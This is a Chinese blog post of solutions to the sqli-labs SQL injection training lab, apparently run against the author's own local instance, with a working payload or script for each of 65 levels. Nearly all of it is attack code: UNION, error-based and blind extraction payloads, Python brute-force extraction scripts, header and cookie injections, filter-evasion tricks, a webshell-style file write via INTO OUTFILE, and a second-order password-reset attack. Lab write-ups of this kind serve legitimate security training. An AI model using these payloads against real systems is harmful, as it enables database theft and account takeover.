zoukankan      html  css  js  c++  java

  • sqli-labs通关记录

    环境搭建:https://www.cnblogs.com/kagari/p/11910749.html

    总体感受:sqli-labs还是只适合入门

    在此基础上添加了一个flag数据库,库名flag,表名flag,字段名flag

    Less-1

    http://172.16.124.149/Less-1/?id=0%27%20union%20select%201,2,flag%20from%20flag.flag%23

    Less-2

    http://172.16.124.149/Less-2/?id=0%20union%20select%201,2,flag%20from%20flag.flag

    Less-3

    http://172.16.124.149/Less-3/?id=0%27)%20union%20select%201,2,flag%20from%20flag.flag%23

    Less-4

    http://172.16.124.149/Less-4/?id=0%22)%20union%20select%201,2,flag%20from%20flag.flag%23

    Less-5

    http://172.16.124.149/Less-5/?id=0%27%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

    Less-6

    http://172.16.124.149/Less-6/?id=0%22%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

    Less-7

    secure_file_priv=/var/www/html

    /var/www/html root:root 755

    /var/www/html/tmp root:root 777

    http://172.16.124.149/Less-7/?id=1%27))%20union%20select%201,2,%27%3C?php%20phpinfo();%27%20into%20outfile%20%27/var/www/html/tmp/phpinfo.php%27%23

    Less-8

    import requests
url='http://172.16.124.149/Less-8/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="0'^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'You are in' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

    Less-9

    import requests
import time
url='http://172.16.124.149/Less-9/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="0'^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid}+and+sleep(0.02))%23".format(i=i,mid=hex(mid))
        t1=time.time()
        r=requests.get(url=url+payload)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

    Less-10

    import requests
import time
url='http://172.16.124.149/Less-10/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload='0"^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid}+and+sleep(0.02))%23'.format(i=i,mid=hex(mid))
        t1=time.time()
        r=requests.get(url=url+payload)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

    Less-11

    post:

    passwd=&uname=' union select 1,(select flag from flag.flag)%23

    Less-12

    post:

    passwd=&uname=") union select 1,(select flag from flag.flag)%23

    Less-13

    post:

    passwd=&uname=') union select%201,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

    Less-14

    post:

    passwd=&uname=" union select%201,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

    Less-15

    import requests
import time
url='http://172.16.124.149/Less-15/'
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="'^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.02))#".format(i=i,mid=hex(mid))
        data={'passwd':'','uname':payload}
        t1=time.time()
        r=requests.post(url=url,data=data)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

    Less-16

    import requests
import time
url='http://172.16.124.149/Less-16/'
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload='")^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.02))#'.format(i=i,mid=hex(mid))
        data={'passwd':'','uname':payload}
        t1=time.time()
        r=requests.post(url=url,data=data)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

    Less-17

    post:

    passwd='^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#&uname=Dhakkan

    Less-18

    POST /Less-18/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 22
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: '^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2))),'','')#
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://172.16.124.149/Less-18/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

uname=Dumb&passwd=Dumb

    Less-19

    POST /Less-19/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 22
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: '^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2))),'')#
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

uname=Dumb&passwd=Dumb

    Less-20

    GET /Less-20/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 0
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: 
Cookie: uname='^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

    Less-21

    base64编码:')^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#

    GET /Less-21/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 0
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: 
Cookie: uname=JyleKHNlbGVjdCBjb3VudCgqKSBmcm9tIG15c3FsLnVzZXIgZ3JvdXAgYnkgY29uY2F0KChzZWxlY3QgZmxhZyBmcm9tIGZsYWcuZmxhZyksZmxvb3IocmFuZCgwKSoyKSkpIw==
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

    Less-22

    base64编码:"^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#

    GET /Less-22/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 0
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: 
Cookie: uname=Il4oc2VsZWN0IGNvdW50KCopIGZyb20gbXlzcWwudXNlciBncm91cCBieSBjb25jYXQoKHNlbGVjdCBmbGFnIGZyb20gZmxhZy5mbGFnKSxmbG9vcihyYW5kKDApKjIpKSkj==
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

    Less-23

    http://172.16.124.149/Less-23/?id=0%27%20union%20select%201,2,flag%20from%20flag.flag;%00

    Less-24

    由于字段长度限制20位,该题只能做到任意用户密码修改

    注册:admin'#/123

    登陆后修改密码:current_password=123&password=admin&re_password=admin&submit=Reset

    admin的密码变为admin

    update语句:UPDATE users SET PASSWORD='admin' where username='admin'#' and password='123'

    Less-25

    http://172.16.124.149/Less-25/?id=%27%20union%20select%201,flag,3%20from%20flag.flag%23

    Less-25a

    http://1172.16.124.149/Less-25a/?id=0%20union%20select%201,2,flag%20from%20flag.flag

    Less-26

    http://172.16.124.149/Less-26/?id=%27%a0union%a0select%a01,flag,3%a0from%a0flag.flag;%00

    Less-26a

    http://127.0.0.1:8080/Less-26a/?id=0%27)union%a0select%a01,2,flag%a0from%a0flag.flag;%00

    Less-27

    http://172.16.124.149/Less-27/?id=%27%a0uNion%a0sElect%a01,flag,3%a0from%a0flag.flag;%00

    Less-27a

    http://172.16.124.149/Less-27a/?id=%22%a0uNion%a0sElect%a01,flag,3%a0from%a0flag.flag;%00

    Less-28

    http://172.16.124.149/Less-28/?id=0%27)%a0uniOn%a0sElect%a01,flag,3%a0from%a0flag.flag;%00

    Less-28a

    http://172.16.124.149/Less-28a/?id=0%27)%a0uniOn%a0sElect%a01,flag,3%a0from%a0flag.flag;%00

    Less-29

    http://172.16.124.149/Less-29/?id=%27%20union%20select%201,flag,3%20from%20flag.flag;%00

    Less-30

    http://172.16.124.149/Less-30/?id=%22%20union%20select%201,flag,3%20from%20flag.flag%23

    Less-31

    http://172.16.124.149/Less-31/?id=%22)%20%20union%20select%201,flag,3%20from%20flag.flag%23

    Less-32

    http://172.16.124.149/Less-32/?id=%df%27%20%20union%20select%201,flag,3%20from%20flag.flag%23

    Less-33

    http://172.16.124.149/Less-33/?id=%df%27%20%20union%20select%201,flag,3%20from%20flag.flag%23

    Less-34

    post:

    passwd=&uname=%df%27%20%20union%20select%20flag,3%20from%20flag.flag%23

    Less-35

    http://172.16.124.149/Less-35/?id=0%20union%20select%201,flag,3%20from%20flag.flag%23

    Less-36

    http://172.16.124.149/Less-36/?id=%df%27%20%20union%20select%201,flag,3%20from%20flag.flag%23

    Less-37

    post:

    passwd=&uname=%df%27%20%20union%20select%20flag,3%20from%20flag.flag%23

    Less-38

    http://172.16.124.149/Less-38/?id=0%27%20union%20select%201,2,flag%20from%20flag.flag%23

    Less-39

    http://172.16.124.149/Less-39/?id=0%20union%20select%201,2,flag%20from%20flag.flag%23

    Less-40

    http://172.16.124.149/Less-40/?id=%27)%20union%20select%201,2,flag%20from%20flag.flag%23

    Less-41

    http://172.16.124.149/Less-41/?id=0%20union%20select%201,2,flag%20from%20flag.flag%23

    Less-42

    post:

    login_password='^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#&login_user=Dhakkan&mysubmit=Login

    Less-43

    post:

    login_password=')^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#&login_user=Dhakkan&mysubmit=Login

    Less-44

    import requests
import time
url='http://172.16.124.149/Less-44/login.php'
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="'^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.2))#".format(i=i,mid=hex(mid))
        data={'login_password':payload,'login_user':'Dhakkan','mysubmit':'Login'}
        t1=time.time()
        r=requests.post(url=url,data=data)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

    Less-45

    import requests
import time
url='http://172.16.124.149/Less-45/login.php'
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="')^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.2))#".format(i=i,mid=hex(mid))
        data={'login_password':payload,'login_user':'Dhakkan','mysubmit':'Login'}
        t1=time.time()
        r=requests.post(url=url,data=data)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

    Less-46

    http://172.16.124.149/Less-46/?sort=1,(1%20regexp%20if((select%20count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))),1,0x00));

    Less-47

    http://172.16.124.149/Less-47/?sort=%27,(1%20regexp%20if((select%20count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))),1,0x00));%23

    Less-48

    import requests
import time
url='http://172.16.124.149/Less-48/?sort=1'
flag=''
for i in range(1,20):
    left=33
    right=128
    
    while right-left!=1:
        mid=(left+right)/2
        payload="%2C(1+regexp+if((substr((select+binary+flag+from+flag.flag)%2C{i}%2C1)%3Ebinary+{mid})%2C1%2C0x00))%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'admin' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

    Less-49

    import requests
import time
url='http://172.16.124.149/Less-49/?sort=1'
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="%27%2C(1+regexp+if((substr((select+binary+flag+from+flag.flag)%2C{i}%2C1)%3Ebinary+{mid})%2C1%2C0x00))%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'admin' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

    Less-50

    http://172.16.124.149/Less-50/?sort=1,(1%20regexp%20if((select%20count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))),1,0x00));

    Less-51

    http://172.16.124.149/Less-51/?sort=%27,(1%20regexp%20if((select%20count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))),1,0x00));%23

    Less-52

    import requests
import time
url='http://172.16.124.149/Less-52/?sort=1'
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="%2C(1+regexp+if((substr((select+binary+flag+from+flag.flag)%2C{i}%2C1)%3Ebinary+{mid})%2C1%2C0x00))%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'admin' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

    Less-53

    import requests
import time
url='http://172.16.124.149/Less-53/?sort=1'
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="%27%2C(1+regexp+if((substr((select+binary+flag+from+flag.flag)%2C{i}%2C1)%3Ebinary+{mid})%2C1%2C0x00))%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'admin' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

    Less-54

    http://172.16.124.149/Less-54/index.php?id=0%27%20union%20select%201,2,flag%20from%20flag.flag%23

    Less-55

    http://172.16.124.149/Less-55/?id=0)%20union%20select%201,2,flag%20from%20flag.flag%23

    Less-56

    http://172.16.124.149/Less-56/?id=%27)%20union%20select%201,2,flag%20from%20flag.flag%23

    Less-57

    http://172.16.124.149/Less-57/?id=%22%20union%20select%201,2,flag%20from%20flag.flag%23

    Less-58

    http://172.16.124.149/Less-58/index.php?id=0%27%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

    Less-59

    http://172.16.124.149/Less-59/?id=0%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

    Less-60

    http://172.16.124.149/Less-60/?id=%22)%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

    Less-61

    http://172.16.124.149/Less-61/?id=%27))%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

    Less-62

    import requests
import time
url='http://172.16.124.149/Less-62/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="0%27)^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'dhakkan' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

    Less-63

    import requests
import time
url='http://172.16.124.149/Less-63/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="0%27^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'dhakkan' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

    Less-64

    import requests
import time
url='http://172.16.124.149/Less-64/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="0))^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'dhakkan' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

    Less-65

    import requests
import time
url='http://172.16.124.149/Less-65/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload='0")^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23'.format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'dhakkan' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag
  • 相关阅读:
    C#中文件操作【File】和【Directory】
    MySql的不同之处
    FileStream读写文件【StreamWriter 和 StreamReader】
    将对象序列化为XML文档
    SQL自增长的数据插入
    POJ3356 AGTC (最短编辑距离问题)
    POJ3070Fibonacci(矩阵快速幂求Fibonacci数列)
    HDOJ1058 Humble Numbers
    第三届软件大赛预赛A组试题及答案
    HDOJ4526 威威猫系列故事——拼车记
  • 原文地址:https://www.cnblogs.com/kagari/p/11928185.html
Copyright © 2011-2022 走看看